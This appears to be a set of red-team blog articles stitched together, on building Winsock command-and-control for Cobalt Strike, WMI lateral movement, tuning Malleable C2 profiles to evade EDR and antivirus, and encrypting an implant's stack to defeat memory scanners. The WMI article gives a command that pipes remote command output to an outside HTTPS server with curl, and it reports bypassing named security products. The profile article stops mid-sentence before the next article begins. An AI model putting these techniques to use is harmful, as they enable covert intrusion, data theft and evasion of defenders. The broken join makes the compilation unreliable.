Developing Winsock Communication in Malware

Winsock is an API (Application Programming Interface) that provides a standardized interface for network programming in the Windows operating system. It enables applications to establish network connections and send and receive data over various protocols such as TCP/IP, UDP, and more. The flexibility and wide adoption of Winsock makes it an attractive choice for malware authors seeking to establish covert communication channels. In this article, we will explore a sample code that demonstrates a basic implementation of end-to-end communication using the Winsock protocol. As the code is ported to BOF, it replaces the default Named Pipes that Cobalt Strike uses with Winsock. Initializing the Winsock server // Initialize WinsockWSAStartup(MAKEWORD(2, 2), &wsaData) != 0; This code initializes the Winsock library by calling the WSAStartup function. These lines set up the server’s address and port information and bind the socket to this address. The code assigns the address family (AF_INET for IPv4) to serverAddress.sin_family. INADDR_ANY is used to bind the socket to all available network interfaces on the server machine, allowing it to accept connections from any IP address. The port number is set to SERVER_PORT using serverAddress.sin_port. The htons function is used to convert the port number to network byte order. The bind function is then called to associate the socket with the server address and port. It takes the socket descriptor (serverSocket), a pointer to the server address structure ((struct sockaddr*)&serverAddress), and the size of the server address structure (sizeof(serverAddress)). bind(serverSocket, (struct sockaddr*)&serverAddress, sizeof(serverAddress); // Listen for incoming connectionslisten(serverSocket, SOMAXCONN); The listen function puts the server socket into a passive listening state. The serverSocket parameter is the socket descriptor that was previously created and bound. SOMAXCONN represents the maximum number of clients that can wait to be accepted by the server. Retrieving the command The code enters a while loop that continues indefinitely until the entire message is received or an error occurs. The recv function is called to receive data from the client socket. It reads data into the buffer starting from the current position buffer + totalBytesRead. It specifies the maximum number of bytes to read as MAX_BUFFER_SIZE – totalBytesRead. The purpose of this code is to read a message sent by the client in chunks until the entire message is received. It allows for the reception of messages that may be larger than the buffer size (MAX_BUFFER_SIZE) by reading the data in multiple iterations. Executing commands The CreateProcessA function is used to create a new process and allows you to specify the command-line parameters for the process. The first parameter NULL specifies that the new process will inherit the environment variables of the calling process. The second parameter (LPSTR)command specifies the command-line string that determines the executable and its arguments. Once executed, ReadFile is used to parse the output at the end of the pipe. Sending the output back This line extracts the socket descriptor from the clientSocketPtr pointer and assigns it to the variable clientSocket. The clientSocketPtr is a void pointer that points to the memory location where the socket descriptor is stored. By using type casting (SOCKET*), the code interprets the pointer value as a pointer to a SOCKET data type and dereferences it to obtain the actual socket descriptor value. This socket descriptor represents the connection between the server and the client. The == SOCKET_ERROR part is a comparison that checks if the return value of the send function is equal to SOCKET_ERROR. This comparison is commonly used to check if the send operation encountered an error. If the comparison is true, it indicates that there was an error in sending the data. Network analysis In our public repository we were able to replace the default Named Pipe communication that Cobalt Strike uses with Winsocket. After loading the CNA script, using “socky” command and the first argument, which is the command to be executed, we are able to send and receive the desired output via Winsocket: For each command sent, it will create 11 packets for the end-to-end communication. In this case we filtered the results to display only the TCP Port 8888 (the port we are using for the communication): Analyzing the packets easily leads to the commands and the results (as no encryption was used). Conclusion In conclusion, this article has provided an overview of Winsock, an API that facilitates network programming in the Windows operating system. Throughout the article, we have examined a sample code that demonstrates a basic implementation of end-to-end communication using the Winsock protocol. By porting the code to BOF (Beacon Object Files), it replaces the default Named Pipes utilized by Cobalt Strike with Winsock. The whole project can be found in our repository.

Navigating Stealthy WMI Lateral Movement

Introduction In this article, we’ll look at a Python script that uses Windows Management Instrumentation (WMI) to remotely control a target computer. The script makes use of COM to communicate with the WMI infrastructure and perform administrative tasks. Using different classes, we will explore different approaches to execute shell commands and observe how each approach works in the background and how they look in the Event Viewer. All the scripts used in the article are published in our Github repository. Win32_Process Class Overview The Win32_Process WMI class represents a process on an operating system. It is the most straightforward way of executing a shell command via WMI. The script starts by importing the WMI module, which provides a Python interface for interacting with the WMI service. A WMI connection is established with the specified target computer, utilizing the provided authentication details (username and password). To execute the command, the script utilizes the Win32_Process class provided by WMI. The Create method of this class is called, with the CommandLine parameter set to the desired command. Impacket’s version of Wmiexec uses this class; however, several articles state that the process relationship involving a parent process known as WMIPRVSE.EXE. and its child process CMD.EXE or POWERSHELL.EXE is a red flag. In order to avoid this behavior, we will use another class, which is mentioned below. If you take a look at the Event Viewer, an Event with ID 4688 will be created. Analyzing this event will reveal the executed command: Win32_ScheduledJob Class Overview Approaching code execution via ScheduledJob might be a better way, as it is not relying on port 139 and 445 (some antivirus software heavily monitors these ports). Instead, it drops the SMB connection function to use Win32_ScheduledJob class to execute commands. It is worth noting that this class works by default on Windows versions under NT6 (Windows Server 2003 and prior). This is because the following registry should be created: Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration Name: EnableAt Type: REG_DWORD Value: 1 Fortunately, WMI provides a class called StdRegProv for interacting with the Windows Registry. With this in hand, we can do a variety of things – including retrieval, creation, deletion and modification of keys and values. We can use the following code to create the required registry key: After the execution, we are able to see the newly created registry: We can now continue with creating the scheduled task. The following script calculates the start time for the scheduled job, which is set to one minute from the current time. change_date_time = datetime.datetime.now() + datetime.timedelta(minutes=1)begin_time = change_date_time.strftime(‘%Y%m%d%H%M%S.000000+100′) The script then utilizes the Win32_ScheduledJob class to create a scheduled job, specifying the command to execute and the start time. job_id, result = c.Win32_ScheduledJob.Create(Command=“cmd /c ipconfig”, StartTime=begin_time) Win32_ScheduledJob Limitations While this technique might be much better and stealthier, the attacker may need to restart the target’s machine to make the setting effective (apply the changed registry). Because Win32_ScheduledJob is based on the NetScheduleJobGetInfo Win32 API (which is no longer available for use as of Windows 8), you cannot use this class in conjunction with the Task Scheduler. Exfiltrating the Data WMI has limitations on parsing the command output as there is no Microsoft-supported way to receive the data, so attackers must find a workaround for this issue. The most popular exfiltration technique that most of the open-source projects use are by redirecting the command’s output in a text file on the remote host’s local ADMIN$ share. One great example is the impacket’s code. However, generating a random-named text file on the ADMIN$ share is quite suspicious. A good simple solution would be to pipe the output on an HTTPS server. This way we avoid writing to the disk and we securely transmit the data in an encrypted HTTP server. This can be achieved by executing the following command: cmd /Q /c <my command> | curl -X POST -k -H ‘Content-Type: text/plain’ –data-binary @- https://myhttpserver A simple Python script is used to create a SSL-supported HTTP server: Below you can see the tool in action against a target with a fully-updated Sophos EDR installed: Conclusion Win32_ScheduledJob is a better, stealthier way of performing lateral movement to the target; however, modifying the registry does require the target restart the machine. Also the Windows version has to be Windows 8 or lower (according to Microsoft). On the other hand, Win32_Process works out of the box. But, as already discussed on the article, this method leads to IOCs such as CMD.EXE being spawned as a child process of WMIPRVSE.EXE All the scripts used in the article are published in our Github repository. References https://github.com/XiaoliChan/wmiexec-RegOuthttps://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-scheduledjobhttps://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/

Unleashing the Unseen: Harnessing the Power of Cobalt Strike Profiles for EDR Evasion

In this blog post, we will go through the importance of each profile’s option, and explore the differences between default and customized Malleable C2 profiles used in the Cobalt Strike framework. In doing so, we demonstrate how the Malleable C2 profile lends versatility to Cobalt Strike. We will also take a step further by improving the existing open-source profiles to make Red-Team engagements more OPSEC-safe. All the scripts and the final profiles used for bypasses are published in our Github repository. The article assumes that you are familiar with the fundamentals of flexible C2 and is meant to serve as a guide for developing and improving Malleable C2 profiles. The profile found at (https://github.com/xx0hcd/Malleable-C2-Profiles/blob/master/normal/amazon_events.profile) is used as a reference profile. Cobalt Strike 4.8 was used during the test cases and we are also going to use our project code for the Shellcode injection. The existing profiles are good enough to bypass most of the Antivirus products as well as EDR solutions; however, more improvements can be made in order to make it an OPSEC-safe profile and to bypass some of the most popular YARA rules. Bypassing memory scanners The recent versions of Cobalt Strike have made it so easy for the operators to bypass memory scanners like BeaconEye and Hunt-Sleeping-Beacons. The following option will make this bypass possible: set sleep_mask “true”; By enabling this option, Cobalt Strike will XOR the heap and every image section of its beacon prior to sleeping, leaving no string or data unprotected in the beacon’s memory. As a result, no detection is made by any of the mentioned tools. BeaconEye also fails to find the malicious process with the sleeping Beacon: While it bypassed the memory scanners, cross-referencing the memory regions, we find that it leads us straight to the beacon payload in memory. This demonstrates that, since the beacon was where the API call originated, execution will return there once the WaitForSingleObjectEx function is finished. The reference to a memory address rather than an exported function is a red flag. Both automatic tooling and manual analysis can detect this. It is highly recommended to enable “stack spoof” using the Artifact Kit in order to prevent such IOC. It is worthwhile to enable this option even though it is not a part of the malleable profile. The spoofing mechanism must be enabled by setting the fifth argument to true: During the compilation, a .CNA file will be generated and that has to be imported in Cobalt Strike. Once imported, the changes are applied to the new generated payloads. Let’s analyze the Beacon again: The difference is very noticeable. The thread stacks are spoofed, leaving no trace of memory address references. It should also be mentioned that Cobalt Strike added stack spoofing to the arsenal kit in June 2021. However, it was found that the call stack spoofing only applied to exe/dll artifacts created using the artifact kit, not to beacons injected via shellcode in an injected thread. They are therefore unlikely to be effective in obscuring the beacon in memory. Bypassing static signatures It is time to test how well the beacon will perform against static signature scanners. Enabling the following feature will remove most of the strings stored in the beacon’s heap: set obfuscate “true”; Once the profile is applied to Cobalt Strike, generate a raw shellcode and put it in the Shellcode loader’s code. Once the EXE was compiled, we analyzed the differences in the stored strings: During many test cases we realized that the beacon still gets detected even if it is using heavy-customized profiles (including obfuscate). Using ThreadCheck we realized that msvcrt string is being identified as “bad bytes”: This is indeed a string found in Beacon’s heap. The obfuscate option isn’t fully removing every possible string: So let’s slightly modify our profile to remove such suspicious strings: This didn’t help much as the strings were still found in the heap. We might need to take a different approach to solve this problem. Clang++ to the rescue Different compilers have their own set of optimizations and flags that can be used to tailor the output for specific use cases. By experimenting with different compilers, users can achieve better performance and potentially bypass more AV/EDR systems. For example, Clang++ provides several optimization flags that can help reduce the size of the compiled code, while GCC (G++) is known for its high-performance optimization capabilities. By using different compilers, users can achieve a unique executable that can evade detection: The string msvcrt.dll is not shown anymore, resulting in Windows Defender being bypassed: Testing it against various Antivirus products leads to some promising results (bear in mind that an unencrypted shellcode was used): Removing strings is never enough Although having obfuscate enabled in our profile, we were still able to detect lots of strings inside the beacon’s stack: We modified the profile a little by adding the following options to remove all the mentioned strings: Problem solved! The strings no longer exist in the stack. Prepend OPCODES This option will append the opcodes you put in the profile in the beginning of the generated raw shellcode. So you must create a fully working shellcode in order not to crash the beacon when executed. Basically we have to create a junk assembly code that won’t affect the original shellcode. We can simply use a series of “0x90” (NOP) instructions, or even better, a dynamic combination of the following assembly instructions’ list: Pick a unique combination (by shuffling the instructions or by adding/removing them) and lastly, convert it to \x format to make it compatible with the profile. In this case, we took the instruction list as it is, so the final junky shellcode will look like the following when converted to the proper format: We took this a step further by automating the whole process with a simple python script. The code will generate a random junk shellcode that you can use on the prepend option: When generating the raw shellcode again with the changed

Masking the Implant with Stack Encryption

This article is a demonstration of memory-based detection and evasion techniques. Whenever you build a Command & Control or you perform threat hunting, there will be scenarios when you might need to analyze the memory artifacts of a specific system—something that is really useful during your live forensics or when you’re going to perform an incident response on a host by segregating that host from the network. In such scenarios, it would be required to identify the payload that is currently running in memory. We will be taking a look at some of the examples of how that payload investigation can be performed, and how that investigation can be bypassed as well. A lot of times during an engagement, an engineer might execute a payload: either Cobalt Strike, Havoc or any other open source C2s that are currently there. There are specific scenarios where the red teamer might want to execute a command on the endpoint, which gathers a lot of strings and sends that to your C2 host. These strings can be username, hostname, or even information related to your command and control server itself and the information might also be encrypted during transit. However, when the payload sleeps on the endpoint, and the red teamer adds sleep and jitter to the beacon, these commands need to be stored in an encrypted way. In this current scenario, this information can be either stored into a heap or on stack. Regarding heap memory, usually we don’t have to worry about it because you can eventually walk a heap, extract information, and encrypt when you are sleeping. However, things change a bit when we talk about stack encryption. The problem with loaders In a traditional shellcode loader, the shellcode is stored in stack memory since it is stored in a variable inside or outside of a function. When the shellcode is written with WriteProcessMemory to a local/remote process, not only is the shellcode stored in that particular memory but also it remains stored in the stack, where the variable lives. Finding the stack To quickly identify where the stack is located, we need to retrieve the RSP address. This register will contain the address of the top of the stack. While the top of the stack is easily identifiable, the bottom is much harder as the stack dynamically increases and/or decreases in size based on the variables that are stored and freed as the code is executed. Luckily VirtualQuery makes it so easy for us to retrieve information about the range of pages in the virtual address space of the calling process. So using the RSP address that we found previously allows us to determine the top and the bottom of the stack: Suspending the thread to avoid abnormal behavior It is required to suspend the process before encrypting or decrypting the stack. This is because modifying the stack while the process is still running can cause unpredictable behavior and potential crashes. To suspend the process, we can use the SuspendThread function from the Windows API, which suspends the execution of a thread until it is resumed with the ResumeThread function. Encrypting what we need to hide Encrypting from the beginning of the page to the bottom of the stack might look suspicious and is not the most OPSEC-safe approach. Instead, we will encrypt where the stack actually begins (RSP address) and the bottom of the stack (minus 8 bytes). Below is the image of the range that should be encrypted, starting from RSP address (where the plaintext strings and the shellcode is stored) until the end of the stack: The encryption routine is pretty simple; XOR byte per byte until you reach the end of the stack: If we analyze the stack of the loader, we can clearly see what the stack will look like after the encryption: There’s no sleepmask without sleeping Some modern detection solutions possess countermeasures against a basic Sleep(). For example, hooking sleep functions like Sleep in C/C++ or Thread.Sleep in C# to nullify the sleep, but also fast forwarding. There is already a nice technique that leverages CPU cycles to perform a custom sleep. I am not going to further describe how it works as it is already well-explained here in this article. Wrapping everything up In conclusion, understanding memory-based detection and evasion techniques is crucial for effective threat hunting and incident response. Investigating the payloads that are running in memory can provide critical information about a system’s state, but it can also be bypassed through stack encryption techniques. The code for this PoC can be found in this GitHub repo. Credits https://shubakki.github.io/posts/2022/12/detecting-and-evading-sandboxing-through-time-based-evasion/ White Knight Labs – Red Team Engagements White Knight Labs is an expert in conducting red team engagements that are tailored to the specific needs of our clients. We believe that every organization has unique security requirements, which is why we work closely with our clients to develop customized testing plans that align with their objectives and security goals. As a tactical, objective-based company, we excel in intense scenarios and strive to provide our clients with a realistic assessment of their security posture. Our experienced team employs advanced tactics and techniques to simulate real-world attacks and identify vulnerabilities that could be exploited by malicious actors. Our red team engagements include a thorough analysis of your organization’s defenses and culminate in a detailed report that outlines our findings and recommendations for strengthening your security posture. With White Knight Labs’ red team engagements, you can be confident that your organization is better equipped to defend against targeted attacks and other sophisticated threats.